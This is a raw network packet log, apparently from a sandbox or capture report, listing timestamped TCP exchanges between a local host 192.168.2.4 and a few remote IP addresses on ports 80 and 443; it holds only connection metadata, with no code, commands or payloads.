                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.690887928 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.690928936 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.690937042 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.690953016 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.690994978 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.691459894 CET49750443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.691559076 CET44349750172.217.19.228192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.691715002 CET49750443192.168.2.4172.217.19.228
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.691716909 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.691730976 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.691744089 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.691783905 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.692365885 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.692382097 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.692423105 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.692446947 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.692718983 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.692753077 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.692766905 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.692800999 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.692816019 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.693674088 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.693687916 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.693700075 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.693761110 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.693774939 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.694195032 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.694209099 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.694247961 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.694289923 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.694919109 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.694941998 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.694955111 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.694967985 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.694977999 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.694996119 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.695017099 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.695807934 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.695823908 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.695835114 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.695897102 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.695911884 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.696574926 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.696589947 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.696602106 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.696649075 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.697355986 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.697369099 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.697381020 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.697393894 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.697421074 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.697449923 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.698048115 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.698061943 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.698075056 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.698112965 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.698154926 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.698803902 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.698817968 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.698829889 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.698842049 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.698879004 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.698949099 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.839310884 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.839452028 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.839452982 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.839495897 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.839510918 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.839577913 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.839787960 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.839845896 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.840071917 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.840106964 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.840123892 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.840157032 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.840451956 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.840502977 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.842200994 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.842236042 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.842247963 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.842271090 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.842297077 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.842317104 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.842988014 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.843044043 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.844650984 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.844708920 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.845349073 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.845383883 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.845418930 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.845421076 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.845436096 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.845464945 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.846806049 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.846857071 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.847481966 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.847517014 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.847534895 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.847552061 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.847589016 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.847600937 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.849198103 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.849792004 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.849827051 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.849862099 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.849873066 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.849891901 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.849912882 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.850567102 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.850604057 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.850639105 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.850640059 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.850661993 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.850684881 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.851273060 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.851340055 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.852835894 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.852870941 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.852890968 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.852907896 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.852952003 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.853641033 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.853754044 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.855155945 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.855190992 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.855207920 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.855257034 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.855840921 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.855876923 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.855899096 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.855910063 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.855931044 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.855967045 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.856628895 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.856664896 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.856686115 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.856698990 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.856734037 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.856743097 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.856791019 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.857271910 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.857311010 CET8049737185.215.113.206192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.857326031 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.857407093 CET4973780192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.875821114 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.875910044 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.875978947 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.876009941 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.876032114 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.876163960 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.876199007 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.876207113 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.876230001 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.876245022 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.876684904 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.876907110 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.876941919 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.876954079 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.877005100 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.877419949 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.877511978 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.877536058 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.877569914 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.877587080 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.877687931 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.877938986 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.878004074 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.878217936 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.878253937 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.878299952 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.878312111 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.878618956 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.878829956 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.878865004 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.878899097 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.878923893 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.878956079 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.879590034 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.879651070 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.879760027 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.879811049 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.880065918 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.880119085 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.880153894 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.880156040 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.880172014 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.880198002 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.880753994 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.880789042 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.880822897 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.880875111 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.880875111 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.881447077 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.881484032 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.881505013 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.881517887 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.881527901 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.882143021 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.882179022 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.882215023 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.882215023 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.882258892 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.882508039 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.882544041 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.882949114 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.882983923 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.883006096 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.883023977 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.883486032 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.883522987 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.883544922 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.883558035 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.883569956 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.884251118 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.884288073 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.884325027 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.884346008 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.884383917 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.885144949 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.885184050 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.885330915 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.885530949 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.885565042 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.885600090 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.885615110 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.886475086 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.886512995 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.886533022 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.886548042 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.886590004 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.887118101 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.887152910 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.887207031 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.887387991 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.887423992 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.887456894 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.887474060 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.887974977 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.888010025 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.888027906 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.888045073 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.888093948 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.888520956 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.888554096 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.888588905 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.888603926 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.889214993 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.889249086 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.889264107 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.889283895 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.889323950 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.889353037 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.889966011 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.890002012 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.890014887 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.890036106 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.890072107 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.890088081 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.890117884 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.890634060 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.890664101 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:36.890728951 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.033397913 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.033459902 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.033477068 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.033493996 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.033543110 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.033543110 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.034066916 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.034080029 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.034094095 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:37.034143925 CET4974380192.168.2.431.41.244.11
